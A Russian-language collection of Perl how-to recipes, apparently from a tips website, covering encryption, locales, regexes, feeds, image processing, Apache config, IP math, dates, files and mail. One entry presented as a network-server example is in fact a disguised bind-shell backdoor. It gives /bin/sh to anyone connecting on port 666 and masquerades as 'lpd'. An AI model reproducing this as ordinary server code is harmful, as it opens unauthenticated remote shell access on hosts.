use Crypt::Blowfish; use Crypt::CBC; my $cipher = new Crypt::CBC("Секретный ключ для шифрования",'Blowfish'); my $crypted_block = $cipher->encrypt_hex($text); my $text = $cipher->decrypt_hex($crypted_block); $cipher->finish();

Установка русской локали в Perl скриптах. [обсудить]

use POSIX qw(setlocale LC_ALL LC_CTYPE LC_NUMERIC); use locale; # ru_RU.KOI8-R, ru_RU.CP1251, ru_RU.ISO-8859-5, ru_RU.UTF-8 my $g_setlocale_all = POSIX::setlocale( &POSIX::LC_ALL, "ru_RU.KOI8-R" ); my $g_setlocale_num = POSIX::setlocale( &POSIX::LC_NUMERIC, "C" );

Запуск ispell для проверки орфографии из скрипта (доп. ссылка 1) [обсудить]

Вывести список слов с ошибками: cat file.txt | ispell -d russian -l Детальный разбор ошибок с вариантами замены: echo file.txt | ispell -d russian -a Для скриптов на perl рекомендую использовать модуль Lingua::Ispell.

Чем в perl лучше шифровать данные. [обсудить]

Необратимое шифрование (хэш или fingerprint): Модули (в порядке возрастания надежности) Digest::MD5, Digest::SHA1, Digest::HMAC_MD5, Digest::HMAC_SHA1 Пример: use Digest::SHA1 qw(sha1_base64); $hash = sha1_base64("test"); Обратимое шифрование по ключу: Модули: Crypt::DES, Crypt::HCE_SHA, Crypt::Blowfish + Crypt::CBC Пример: use Crypt::Blowfish; use Crypt::CBC; $cipher_handle = new Crypt::CBC($encrypt_key,'Blowfish'); $crypted_text = $cipher_handle->encrypt_hex($text); $text = $cipher_handle->decrypt_hex($crypted_text); Шифрование с использованием открытого ключа: Crypt::OpenPGP, Crypt::GPG , Crypt::PGP5.

Генерация случайной последовательности символов на Perl [обсудить]

sub sys_true_rand { my ($num_char) = @_; # Число символов в качестве параметра. my $dev_line; my $rand_line = ""; open(UR,"</dev/urandom") || die "Cam't open /dev/urandom""; do { read (UR, $dev_line, 4096); $dev_line =~ s/[^\w\d]//g; $rand_line .= $dev_line; } until (length($rand_line) >= $num_char); close(UR); return substr($rand_line,0, $num_char); }

Как используя Perl разбить число на триады Автор: gr [обсудить]

$num = 100000000000000; $num =~ s/(\d{1,3}(?=(?:\d\d\d)+(?!\d)))/$1,/g;

Как в Perl вырезать у строки лидирующие пробелы [комментарии]

$str =~ s/^\s*([^\s]?.*)$/$1/; $str =~ s/^(.*[^\s])\s*$/$1/; # два regex работают быстрее, чем один более сложный

Как найти подстроку находящуюся в переменной с экранированием опасных символов. [обсудить]

Для экранирования спец. символов в строке подставляемой в регуларное выражение, строку нужно разместить между модификаторами \Q и \E, при этом все спецсимволы не будут интерпретироваться как операторы рег. выражения. Например: /\Q$str\E/ Или можно использовать функцию index(): $pos = index($строка, $подстрока); if ($pos < 0){ # Подстрока не найдена. } else { # В $pos - позиция первой совпавшей позиции подстроки. }

Как работать с параметрами передаваемыми в командной строке [обсудить]

use Getopt::Long; GetOptions("prefix=s", \$prefix, "prefix-man=s", \$prefix_man); $prefix = defined($prefix) ? $prefix : $default_install_path; $prefix_man = defined($prefix_man) ? $prefix_man : $default_install_man;

Как преобразовать число в определенный формат [обсудить]

Примеры: $a = sprintf("%4.2f",$num); $a = sprintf("%06X%06X",$num1,$num2); $a = sprintf("%04i",$num);

Обработка RSS и Atom лент на языке Perl [комментарии]

Для обработки RSS/Atom лент удобно использовать perl модуль XML::Feed, у которого есть один неприятный недостаток - необходимость установки очень большого числа зависимостей. Для работы XML::Feed во FreeBSD нужно установить около 100 дополнительных Perl модулей, не входящих в состав Perl 5.8. В качестве альтернативы с похожим синтаксимои и минимальным числом зависимостей можно предложить модуль XML::FeedPP (http://search.cpan.org/dist/XML-FeedPP/), в зависимостях у которого значится только XML::TreePP (http://search.cpan.org/dist/XML-TreePP/). Отрицательной чертой XML::FeedPP является невысокая производительность, так как модуль целиком написан на Perl, без привлечения библиотек подобных expat и libxml. Простой пример парсинга RSS, RDF или Atom ленты: #!/usr/bin/perl use strict; use XML::FeedPP; my $feed = XML::FeedPP->new( './test.xml'); # Вместо файла можно указать URL print "Заголовок ленты: ", $feed->title(), "\n"; print "Дата: ", $feed->pubDate(), "\n"; # Выводим список новостей, отраженных в ленте foreach my $item ( $feed->get_item() ) { print "URL: " . $item->link() . "\n"; print "Title: " . $item->title() . "\n"; } Кроме $item->link() и $item->title(), у объекта $item имеются следующие методы: $item->description(), $item->pubDate(), $item->category(), $item->author(), $item->guid(), $item->get( произвольное_имя_параметра). Для преобразования нескольких Atom и RSS в один RSS можно использовать: # создаем пустой RSS файл my $feed = XML::FeedPP::RSS->new(); # присоединяем локальный atom файл $feed->merge("atom.xml"); # присоединяем удаленный RSS $feed->merge( "http://www.test.com/rss.xml" ); # меняем время модификации. my $now = time(); $feed->pubDate( $now ); # меняем название ленты $feed->title( "Sumary news" ); # добавляем в ленту свой элемент (заголовок Test, ссылка http://test.com/news/1, id 12345) my $item = $feed->add_item( "http://test.com/news/1" ); $item->title( "test" ); $item->pubDate( "2009-02-23T14:43:43+09:00" ); $item->guid(12345); # сохраняем в строку $rss_str готовую RSS ленту my $rss_str = $feed->to_string(); # или сохраняем в файл $feed->to_file( "index.rss" );

Обработка изображений на Perl

Русский язык в графиках GD::Graph Автор: dawnshade [комментарии]

Для рисования русских букв, слов на графиках, построенных модулем perl GD::Graph необходимо все переменные с русским тексом перевести в кодировку utf8. Например модулем Unicode::Map8: my $unicoded_txt = Unicode::Map8->new("cp1251"); Дополнительно нужно указать ttf шрифт, поддерживающий unicode. Например виндовый arial.ttf: $graph->set_value_font('/usr/share/fonts/arial.ttf', 9); Опробовано с p5-GD-Graph-1.43 и p5-Unicode-Map8-0.12.

Как на perl сконвертировать изображения из одного формата в другой (доп. ссылка 1) Автор: Леонид Палагин [обсудить]

use Image::Magick; my $image = Image::Magick->new; #новый проект my $x = $image->Read("photo.jpg"); #открываем файл jpg $x = $image->Write("photo.png"); #Сохраняем изображение png.

Как нормализовать цвета и контрастность изображения через Image::Magic (доп. ссылка 1) Автор: Леонид Палагин [комментарии]

use Image::Magick; my $image = Image::Magick->new; #новый проект my $x = $image->Read("photo.jpg"); #открываем файл $image->Contrast(); #Контрастность $image->Normalize(); #Нормализуем цвета $x = $image->Write("photo.jpg"); #Сохраняем изображение.

Масштабирование картинки на Perl (модуль Image::Magick) без потери качества (доп. ссылка 1) Автор: Леонид Палагин [комментарии]

use Image::Magick; my $image = Image::Magick->new; #новый проект my $x = $image->Read("photo.jpg"); #открываем файл my ($ox,$oy)=$image->Get('base-columns','base-rows'); #определяем ширину и высоту изображения my $nx=int(($ox/$oy)*150); #вычисляем ширину, если высоту сделать 150 $image->Resize(geometry=>geometry, width=>$nx, height=>150); #Делаем resize (изменения размера) if($nx > 200) { #Если ширина получилась больше 200 my $nnx = int(($nx-200)/2); #Вычисляем откуда нам резать $image->Crop(x=>$nnx, y=>0); #Задаем откуда будем резать $image->Crop('200x150'); #С того места вырезаем 200х150 } $x = $image->Write("photo.jpg"); #Сохраняем изображение.

Подпрограммы для WEB

Автоматическое получение списка запрещенных сайтов от РОСКОМНАДЗОР с помощью Perl Автор: Lennotoecom [комментарии]

Скрипт для автоматической загрузки списка запрещенных сайтов: use MIME::Base64; use SOAP::Lite; open REQ,'<request.xml'; $req.=$_ while <REQ>; close REQ; encode_base64($req); open SIG,'<PKCS#7'; $sig.=$_ while <SIG>; close SIG; $soap = SOAP::Lite->service('http://vigruzki.rkn.gov.ru/services/OperatorRequest/?wsdl'); $r = $soap->getLastDumpDate(); print "time: $r\\n"; @r = $soap->sendRequest($req, $sig); $code = $r[2]; print "code: $code\\n"; sleep 1, print "$_\\n" for 1..300; @r = $soap->getResult($code); open ZIP,'>register.zip'; print ZIP decode_base64($r[$#r]); close ZIP; Дополнение: Сервис рнк обновился, ниже пример автоматической выгрузки в соответствии с изменёнными рекомендациями: use MIME::Base64; use SOAP::Lite; undef $/; open REQ,'</home/rkn/request.xml'; $req = <REQ>; close REQ; encode_base64($req); open SIG,'</home/rkn/PKCS#7'; $sig = <SIG>; close SIG; $dfv = '2.0'; $soap = SOAP::Lite->service('http://vigruzki.rkn.gov.ru/services/OperatorRequest/?wsdl'); $a = $soap->getLastDumpDate(); @a = $soap->sendRequest($req, $sig, $dfv); while(1) { sleep 60; @b = $soap->getResult($a[2]); last if $b[2] ne 0; } if($b[2] eq 1){ open ZIP,'>/home/lennotoecom/file.zip'; print ZIP decode_base64($b[1]); close ZIP; } Цикл выполняется раз в минуту (по рекомендации ркн), каждый раз проверяя полученный от сервиса код ($b[2]), пока переменная 0 цикл выполняется, как только код меняется на значения от -1 до -7(ошибки) или 1 (успешный), цикл завершается. Значения кодов ошибок можно посмотреть в официальной документации, по ссылке.

Скрипт для просмотра открытых табов в Firefox [комментарии]

Иногда требуется узнать какие вкладки оставлены открытыми в Firefox, запущенном на другой машине. Ниже представленный Perl-скрипт выводит из файла sessionstore.js список открытых табов в формате "url заголовок": print_open_tabs.pl: #!/usr/bin/perl use strict; use JSON; # Читаем содержимое в файл my $json_text = <>; # Преобразуем JSON-блок в хэш, предварительно убирая лидирующие скобки my $perl_scalar = from_json(substr($json_text,1,-1), {utf8 => 1}); # Последовательно перебираем открытые окна и табы foreach my $windows_block (@{$perl_scalar->{windows}}){ foreach my $tabs_block (@{$windows_block->{tabs}}){ # выводим активные табы по их индексу if ($tabs_block->{"index"} > 0){ my $idx = $tabs_block->{"index"}-1; print "$tabs_block->{entries}[$idx]{url}\t$tabs_block->{entries}[$idx]{title}\n"; } } } Пример использования: ./print_open_tabs.pl ~/.mozilla/firefox/*.default/sessionstore.js

Управление конфигурацией Apache из скрипта, при помощи Perl модуля Apache::Admin::Config (доп. ссылка 1) Автор: User Di [комментарии]

Для парсинга и изменения конфигурации Apache удобно использовать модуль Apache::Admin::Config (http://search.cpan.org/dist/Apache-Admin-Config) Пример использования. Имеем блок конфигурации <VirtualHost *:80> ServerAdmin rr522@dfghg.com DocumentRoot /home/ab/www/data ServerName mydomain.com ServerAlias mydomain.com *.ydomain.com CustomLog /home/ab/log/httpd-access.log combined ErrorDocument 101 http://s.org </VirtualHost> Нижеприведенный кусок кода, считает содержимое некоторых директив VirtualHost для определенного сервера use Apache::Admin::Config; ... my $conf = new Apache::Admin::Config "путь к файлу конфигурации" or die $Apache::Admin::Config::ERROR; # Перебираем все директивы VirtualHost foreach my $vh ( $conf->section('VirtualHost') ) { if ( $vh->directive('ServerName')->value eq "имя искомого хоста" ) { # Нашли нужный хост, читаем параметры my $serveradmin = $vh->directive('ServerAdmin'); my $costomlog = $vh->directive('CustomLog'); my $errorlog = $vh->directive('ErrorLog'); my @drtvs4 = $vh->directive('ErrorDocument'); my $serveralis = $vh->directive('ServerAlias'); .... # Добавляем новый алиас к параметрам ServerAlias $vh->directive('ServerAlias')->set_value($serveralis . " " . "новый алиас"); .... # Записываем измененный файл на диск $conf->save; } } ... # Пример добавления новой секции VirtualHost с Location внутри. my $vhost = $conf->add_section(VirtualHost=>'127.0.0.1'); $vhost->add_directive(ServerAdmin=>'webmaster@localhost.localdomain'); $vhost->add_directive(DocumentRoot=>'/usr/share/www'); $vhost->add_directive(ServerName=>'www.localhost.localdomain'); $vhost->add_directive(ErrorLog=>'/var/log/apache/www-error.log'); my $location = $vhost->add_section(Location=>'/admin'); $location->add_directive(AuthType=>'basic'); $location->add_directive(Require=>'group admin'); $conf->save;

Как на Perl правильно выделить все A HREF ссылки из HTML файла. [комментарии]

use HTML::TokeParser; my $p = HTML::TokeParser->new("index.html"); if ($p->get_tag("title")){ my $title = $p->get_trimmed_text; # Содержимое <title> } while (my $token = $p->get_tag("a")) { # перибираем все <a href> my $url = $token->[1]{href} || ""; my $text = $p->get_trimmed_text("/a"); # Текст между <a ...> и </a> }

Как считать список установленных cookies в хеш. [обсудить]

sub load_cookies{ local (*cook_arr) = @_; foreach (split(/\;\s*/,$ENV{'HTTP_COOKIE'})){ my ($cur_key, $cur_val) = split(/\=/); $cook_arr{"$cur_key"} = $cur_val; } } load_cookies(*cooks); print $cooks{"cook_name"};

Как добится показа русских букв в JavaScript (перекодировка в UTF) [обсудить]

Для показа русских букв в JavaScript блоке нужно перекодировать их в UTF: sub koi2utf{ my($str)=@_; $_=$str; s/ё/ё/g; s/Ё/Ё/g; s/ю/ю/g; s/а/а/g; s/б/б/g; s/ц/ц/g; s/д/д/g; s/е/е/g; s/ф/ф/g; s/г/г/g; s/х/х/g; s/и/и/g; s/й/й/g; s/к/к/g; s/л/л/g; s/м/м/g; s/н/н/g; s/о/о/g; s/п/п/g; s/я/я/g; s/р/р/g; s/с/с/g; s/т/т/g; s/у/у/g; s/ж/ж/g; s/в/в/g; s/ь/ь/g; s/ы/ы/g; s/з/з/g; s/ш/ш/g; s/э/э/g; s/щ/щ/g; s/ч/ч/g; s/ъ/ъ/g; s/Ю/Ю/g; s/А/А/g; s/Б/Б/g; s/Ц/Ц/g; s/Д/Д/g; s/Е/Е/g; s/Ф/Ф/g; s/Г/Г/g; s/Х/Х/g; s/И/И/g; s/Й/Й/g; s/К/К/g; s/Л/Л/g; s/М/М/g; s/Н/Н/g; s/О/О/g; s/П/П/g; s/Я/Я/g; s/Р/Р/g; s/С/С/g; s/Т/Т/g; s/У/У/g; s/Ж/Ж/g; s/В/В/g; s/Ь/Ь/g; s/Ы/Ы/g; s/З/З/g; s/Ш/Ш/g; s/Э/Э/g; s/Щ/Щ/g; s/Ч/Ч/g; s/Ъ/Ъ/g; return $_; }

Работа с сетью и IP адресами на Perl

Подсчет exim трафика с разделением на локальный и мировой Автор: DelGod [комментарии]

В файле конфигурации exim пишем: log_file_path = /var/log/exim/exim-%s-%D.log log_selector = +delivery_size +sender_on_delivery +received_recipients В файл /var/db/ukr_net ложим список украинских сетей И собствено скрипт для подсчета трафика с разделением на украинский и мировой: #!/usr/bin/perl -w my ($nmin, $nmax) = (32,0); open UKRNETS, "/var/db/ukr_net"; while (<UKRNETS>) { s/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\/([0-9]+)$//; $UkrIPs{substr(substr(unpack("B32", pack("N", $1)),24).substr(unpack("B32", pack("N", $2)),24).substr(unpack("B32", pack("N", $3)),24).substr(unpack("B32", pack("N", $4)),24),0,$5)}="$1.$2.$3.$4\/$5"; $nmin = $5 if $5 < $nmin; $nmax = $5 if $5 > $nmax; } close UKRNETS; open TRAFF, '/var/log/exim/exim-main-20060122.log'; while (<TRAFF>) { my ($mail_from,$mail_to,$ip,$bytes_in,$bytes_out); if (/^[0-9-]+ [0-9:]+ [A-Za-z0-9]{6}-[A-Za-z0-9]{6}-[A-Za-z0-9]{2} <= ([^\@]+@[A-Za-z0-9-.]+).* H=.*\[([0-9.]+)\].* S=([0-9]+).* for ([^\@]+@[A-Za-z0-9-.]+)$/) { $mail_1=$1; $mail_2=$4; $ip=$2; $bytes_in=$3; $bytes_out=0; } elsif (/^[0-9-]+ [0-9:]+ [A-Za-z0-9]{6}-[A-Za-z0-9]{6}-[A-Za-z0-9]{2} [\=\-\*]\> ([^\@]+@[A-Za-z0-9-.]+).* F=\<([^\@]+@[A-Za-z0-9-.]+)\>.* T=remote_smtp S=([0-9]+).* H=.*\[([0-9.]+)\].*/) { $mail_1=$2; $mail_2=$1; $ip=$4; $bytes_in=0; $bytes_out=$3; } if ((defined($ip)) and ($ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/)) { my $ipB=substr(unpack("B32", pack("N", $1)),24)."".substr(unpack("B32", pack("N", $2)),24)."".substr(unpack("B32", pack("N", $3)),24)."".substr(unpack("B32", pack("N", $4)),24); for ($Ne=$nmax; $Ne>=$nmin; $Ne--) { my $ipBin=substr($ipB,0,$Ne); if ($UkrIPs{$ipBin}) { $m_from{$mail_1}{ukr}{in} +=$bytes_in; $m_from{$mail_2}{ukr}{in} +=$bytes_in; $m_from{$mail_1}{ukr}{out}+=$bytes_out; $m_from{$mail_1}{mir}{in} -=$bytes_in; $m_from{$mail_2}{mir}{in} -=$bytes_in; $m_from{$mail_1}{mir}{out}-=$bytes_out; last; } } $m_from{$mail_1}{mir}{in} +=$bytes_in; $m_from{$mail_2}{mir}{in} +=$bytes_in; $m_from{$mail_1}{mir}{out}+=$bytes_out; } } close TRAFF; my $i=0; foreach $mails (keys %m_from) { $i++; print "$i $mails in ukr $m_from{$mails}{ukr}{in} out ukr $m_from{$mails}{ukr}{out} in mir $m_from{$mails}{mir}{in} out mir $m_from{$mails}{mir}{out} "; }

Пример perl скрипта для привязки программы к сетевому порту (доп. ссылка 1) Автор: Y4Ho [комментарии]

Скрипт демонстрирует организацию серверного приложения с перенаправдением запросов к определенной программе. #!/usr/bin/perl #Y! Underground Group #code by:Y4Ho #We Are :Y4Ho0-Iranvertex-MrPorT-S.s-LordSatan-SirSisili #Email:info@emperorteam.com #Email:y4ho0_emperor@yahoo.com #Homepage:www.emperorteam.com #tnxto:C0llect0r-Sasan-Shabgard-simorgh.Ev-IHS #Ex: ./Y!.pl use Socket; $port = 666; $proto = getprotobyname('tcp'); $cmd = "lpd"; $system = '/bin/sh'; $0 = $cmd; socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(SERVER, SOMAXCONN) or die "listen: $!"; for(; $paddr = accept(CLIENT, SERVER); close CLIENT) { open(STDIN, ">&CLIENT"); open(STDOUT, ">&CLIENT"); open(STDERR, ">&CLIENT"); system($system); close(STDIN); close(STDOUT); close(STDERR); } #EoF

Как в perl выполнить DNS преобразование IP в имя и наоборот. [комментарии]

Из IP в имя: use Socket; my $host = gethostbyaddr(inet_aton("192.168.1.1"), AF_INET); Из хоста в IP: use Socket; my $ip = inet_ntoa((gethostbyname("www.test.ru"))[4]);

Как пропатчить приложение запускаемое через inetd для определения IP клиента. Автор: uldus [обсудить]

Си: struct sockaddr_in addr_name; socklen_t addr_len; addr_len = sizeof(addr_name); bzero(&addr_name, sizeof(addr_name)); if (getpeername(0, (struct sockaddr *)&addr_name, &addr_len) >= 0){ // выводим адрес в printf через inet_ntoa(addr_name.sin_addr) } Perl: use Socket; my $std_sockaddr = getpeername(STDIN); my $cur_ipaddr = "0.0.0.0"; if (defined $std_sockaddr){ my ($tmp_port, $tmp_iaddr) = sockaddr_in($std_sockaddr); $cur_ipaddr = inet_ntoa($tmp_iaddr); }

Пример использования Net::FTP для доступа к FTP в Perl [комментарии]

$ftp = Net::FTP->new("ftp сервер", Timeout => 30, Debug => 0) || die "Can't connect to ftp server.\n"; $ftp->login("логин", "пароль") || die "Can't login to ftp server.\n"; $ftp->cwd("переход в директорию") || die "Path $cfg_remote_path not found on ftp server.\n"; $ftp->binary(); $size = $ftp->size("файл для которого нужно узнать размер"); $time = $ftp->mdtm("файл для которого нужно узнать время изменения"); $ftp->delete("директория для удаления"); $ftp->mkdir("директория для создания"); $ftp->rename("старое имя для переименования","новое имя"); $ftp->put("имя файла на локальном диске для закачки", "имя файла на ftp"); $ftp->put(*FD, "имя файла на ftp"); # Все что идет в FD будет сохранено. $ftp->get("удаленный файл", "локальный файл"); $ftp->quit();

Как по IP адресу хоста и маске подсети определить адрес подсети. [комментарии]

$ip = "192.168.1.43"; $nm = "255.255.255.224"; print "\nip addr = $ip\nnetmask = $nm\n"; ($ip1, $ip2, $ip3, $ip4) = split(/\./, $ip); ($nm1, $nm2, $nm3, $nm4) = split(/\./, $nm); $sb1=$ip1 & $nm1; $sb2=$ip2 & $nm2; $sb3=$ip3 & $nm3; $sb4=$ip4 & $nm4; print "subnet = $sb1\.$sb2\.$sb3\.$sb4\n\n";

Операции проверки IP на вхождение в сеть a.b.c.d/N или a.b.c.d/n.n.n.n (доп. ссылка 1) [комментарии]

$find_net = '123.123.45.4/30'; $some_ip = '123.123.45.5'; my ($net_ip, $net_mask) = split(/\//, $find_net); my ($ip1, $ip2, $ip3, $ip4) = split(/\./, $find_net); my $net_ip_raw = pack ('CCCC', $ip1, $ip2, $ip3, $ip4); my $net_mask_raw = pack ('B32', (1 x $net_mask), (1 x (32 - $net_mask))); # $some_ip_raw вычисляем по аналогии с $net_ip_raw ($ip1, $ip2, $ip3, $ip4) = split(/\./, $some_ip); my $some_ip_raw = pack ('CCCC', $ip1, $ip2, $ip3, $ip4); if (($some_ip_raw & $net_mask_raw) eq $net_ip_raw){ # $some_ip_raw входит в подсеть $find_net } При указании маски вида $find_net = '123.123.45.4/255.255.255.224' вместо pack можно преобразовать IP и маску в число по алгоритму: $net_ip_raw = ($ip1<<24) + ($ip2<<16) + ($ip3<<8) + $ip4; Тоже проделать с маской и проверяемым IP, вхождение в подсеть будет проверяться условием: if ($some_ip_raw & $net_mask_raw) == $net_ip_raw){ # $some_ip_raw входит в подсеть $find_net } Другой вариант: use Socket; sub isinsubnet { my ($subnethost, $subnetmask, $testhost) = @_; $subnethost = inet_aton($subnethost); $subnetmask = inet_aton($subnetmask); $testhost = inet_aton($testhost); return (($subnethost & $subnetmask) eq ($testhost & $subnetmask)); }

Работа со временем и датами

Как определить смещение в часах для текущей временной зоны в Perl и Shell [обсудить]

Perl: use POSIX (strftime); my $tz = strftime("%z", localtime); $tz =~ s/(\d\d)(\d\d)/$1/; Shell: date +%z|sed 's/[0-9][0-9]$//'

Как на perl преобразовать дату заданную в виде строки [обсудить]

use Date::Parse; my $time = str2time("Wed, 9 Jun 2003 09:50:32 -0500 (EST)");

Как определить дату начала и конца недели на Perl (доп. ссылка 1) Автор: whirlwind.ru [обсудить]

my $dofw = (localtime())[6]; my $time = time(); my $inday = 86400; Начало недели $time - $inday * $dofw или localtime($time - $inday * $dofw) Конец недели $time + $inday * (6 - $dofw) или localtime($time + $inday * (6 - $dofw))

Как зная день, месяц, год и время получить Epoch время (сек. от 1.1.1970) [комментарии]

perldoc Time::Local; $time = timelocal($sec,$min,$hours,$mday,$mon,$year); С помощью Time::Local можно посчитать число секунд, дней, месяцев и т.д. относительно какой-либо даты.

Чем воспользоваться для преобразования дат [обсудить]

модуль Date::Calc

Как использовать промежутки времени меньше секунды [комментарии]

модуль Time::HiRes

Как получить и отобразить текущее время [комментарии]

($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time()); $mon++; $year += 1900; $time_str = sprintf ("%.2ld/%.2ld/$year %.2ld:%.2ld:%.2ld", $mday,$mon,$hour,$min,$sec);

Работа с файлами

Манипулирование файловыми хэндлерами в Perl (доп. ссылка 1) [обсудить]

Пример хранение дескрипторов в хэше: my %user_fd = (); if (! defined $user_fd{$cur_login}){ open($user_fd{$cur_login}, ">$cur_file") or return -1; } print {$user_fd{$cur_login}} "TEST\n"; close($user_fd{$cur_login}); Пример передачи дескриптора из функции: # Для perl 5.6 и старше open (my $fh, $file_name); print $fh "Hello World!\n"; process_file( $fh ); open (FILE, "> $filename)"; process_typeglob( *FILE ); process_reference( \*FILE ); sub process_typeglob { local *FH = shift; print FH "Typeglob!" } sub process_reference { local $fh = shift; print $fh "Reference!" } my $fh = myopen("file_path"); while (<$fh>) { .... } close $fh; sub myopen { my $path = shift; local *FH; open (FH, $path) || return undef; return *FH; }

Как в Perl/PHP выводить данные без буферизации, не дожидаясь конца строки [комментарии]

Perl: "$!=1;" или "use IO::Handle; FH->autoflush(1);" PHP: После каждой операции вывода вызывать flush();

Как на Perl прочитать и преобразовать права доступа к файлу в приемлимый для chmod вид. [комментарии]

$file_mode = (stat( $file_path ))[2]; $stat_mode = sprintf ("%04o", $stat_mode & 07777); print "chmod $stat_mode $file_path\n"; chmod ($stat_mode, "файл");

Как получить рекурсивный список файлов [обсудить]

use File::Find; sub get_file{ my ($file_name) = $_; my $file_fullpath = $File::Find::name; my $file_dir = $File::Find::dir; } find (\&get_file, "/usr/some/dir");

Как получить список файлов в директории [комментарии]

opendir (DIR,"$dir_path"); my @files=grep (!/^\.+$/,readdir (DIR)); # или foreach my $cur_file (readdir(DIR)){..} closedir (DIR);

Работа с электронной почтой

Проверка существования email в AD (ldap) для маршрутизации письма на Exchange Автор: 2dfx [комментарии]

У нас в компании используется сервер Exchange для обмена почтовыми сообщениями. Но для отправки сообщений во "вне" используем Communigate Pro. Communigate (CGP for Linux) используется только как прослойка и письма отправленные на известные домены пересылаются на Exchange. схема Internet | | Communigate Pro | | Exchange | | Users Но если просмотреть логи, то можно увидеть, что есть огромные очереди на адреса, которых не существует и соответственно куча DNR. Значит нужно как-то отсеивать эти настырные подключения. Пришел к выводу, что можно сделать External Authentication + скрипт на perl + запретить пересылку писем на exchange (это будет делать скрипт) Что было сделано. 1. На communigate включил External Authentication (В helpers) с параметрами: Program Path: /var/CommuniGate/adrelay.pl Time-out: 20s Auto-Restart: 30s Не забыть поставить галку External Authentication 2. Так же на communigate в разделе Users - Domain Defaults - Unknown Names: Consult External for Unknown: Yes Mail to Unknown: Rejected Теперь напишем скрипт в /var/CommuniGate/adrelay.pl #!/usr/bin/perl use Net::LDAP; my $searchBase = 'dc=DOMAIN,dc=local'; my @ldap_servers=( { address=>'XXX.XXX.XXX.XXX', # the address or IP of LDAP server port=>389, # LDAP port, 389 by default timeout=>5, # timeout in seconds, 20 by default adminDN=>'LDAPUSER@DOMAIN.local', # the DN for admin bind adminPassword=>'Password', # the DN PASSWORD for admin bind }, { address=>'XXX.XXX.XXX.XXX', # the address or IP of LDAP server2 port=>389, # LDAP port, 389 by default timeout=>5, # timeout in seconds, 20 by default adminDN=>'LDAPUSER@DOMAIN.local', # the DN for admin bind adminPassword=>'Password', # the DN PASSWORD for admin bind }, { address=>'XXX.XXX.XXX.XXX', # the address or IP of LDAP server3 port=>389, # LDAP port, 389 by default timeout=>5, # timeout in seconds, 20 by default adminDN=>'LDAPUSER@DOMAIN.local', # the DN for admin bind adminPassword=>'Password', # the DN PASSWORD for admin bind }, ); $| = 1; print "* MegaScript started\n"; my ($ldapServerID,$ldapServerTried)=(0,0); while(<STDIN>) { chomp; # remove \n from the end of line my ($prefix,$method,@eargs) = split(/ /); if($method eq 'NEW') { unless($prefix && $method && $eargs[0]) { print "$prefix ERROR Expected: nnn NEW user\@domain\n"; } else { my $errorMsg=new_command($prefix,$eargs[0]); if(defined $errorMsg) { print "$prefix ERROR $errorMsg\n"; } } } elsif ($method eq 'INTF' ) { if($eargs[0] < 3) { print "* This script requires CGPro version 4.1b7 or newer\n"; exit; } exit; } print "$prefix INTF 3\n"; } elsif($method eq 'QUIT') { print "$prefix OK\n"; last; } else { print "$prefix ERROR Only NEW, INTF and QUIT commands supported\n"; } } print "* Megascript done\n"; exit(0); sub tryConnectServer { my $theServer=$ldap_servers[$ldapServerID]; print "* trying to connect to $theServer->{address}\n"; my $ldap = Net::LDAP->new($theServer->{address},port=>($theServer->{port} || 389),timeout=>($theServer->{timeout} || 20) ) || return undef; return $ldap; } sub tryConnect { my $nServers=scalar(@ldap_servers); for(my $nTried=0;$nTried<$nServers;$nTried++) { if($ldapServerID>=$nServers) { $ldapServerID=0;} my $ldap=tryConnectServer(); return $ldap if($ldap); ++$ldapServerID; } return undef; } sub new_command { my ($prefix,$user)=@_; my ($name,$domain)=("",""); if($user =~ /(.+)\@(.+)/) { $name=$1; $domain=$2; } else { return "Full account name with \@ and domain part expected"; } my $ldap = tryConnect(); unless($ldap) { return "Failed to connect to all LDAP servers"; } my $adminDN=$ldap_servers[$ldapServerID]->{adminDN}; my $adminPassword=$ldap_servers[$ldapServerID]->{adminPassword}; my $result=$ldap->bind($adminDN,password=>$adminPassword) || return "Can't bind as admin: ".$result->error; $result->code && return "Can't bind as admin: ".$result->error; my $mesg = $ldap->search ( # perform a search base => $searchBase, scope => "subtree", filter => "(&(proxyAddresses=smtp:$name\@$domain) (objectclass=*))" ); $ldap->unbind(); unless(defined $mesg) { return "LDAP search failed"; } if($mesg->all_entries() eq 0) { return "address $name\@$domain NOT exists"; } else { print "$prefix ROUTED $name\%$domain\@[IPEXCHANGE]\n"; # Pomenyai IPEXCHANGE!!!!!!!!!!!! return undef; } }; Что делает скрипт. При получении адреса e-mail в RCPT TO ищет его в AD в атрибутах пользователей. Если не находит, то сообщение игнорируется. Проверить работоспособность скрипта можно запустив его и набрать 1 NEW email@domain.ru Если выдаст ROUTED email%domain.ru@IPEXCHANGE - то значит все ОК!!!

Отправка почты с вложением из perl с помощью sendmail Автор: Andrey [комментарии]

use MIME::Base64 qw(encode_base64); my $sendmail = '/usr/sbin/sendmail'; my $to = 'linux@domain1.ru'; my $from = 'my@domain2.ru'; my $attachment = '/path_to/file.tar.gz'; my $buf; my $subject = MIME::Base64::encode_base64('Здесь размещаем тему письма.'); $subject =~ s/\n//g; my $data; $data = MIME::Base64::encode_base64("<p>Здесь<br>Можно разместить текст сообщения.<br></p>"); my $boundary = 'simple boundary'; open(MAIL, "| $sendmail -t -oi") or die("$!"); print MAIL <<EOF; To: $email_to From: $email_from Subject: =?UTF-8?B?$subject?= Content-Type: multipart/mixed; boundary="$boundary" This is a multi-part message in MIME format. --$boundary Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: base64 $data --$boundary Content-Type: application/octet-stream; name="$attachment" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="$attachment" EOF open(FILE, "<$attachment") or die "$!"; while (read(FILE, $buf, 60*57)) { print MAIL encode_base64($buf); } close FILE; close MAIL;

Как отправить HTML письмо с вложенными картинками. [обсудить]

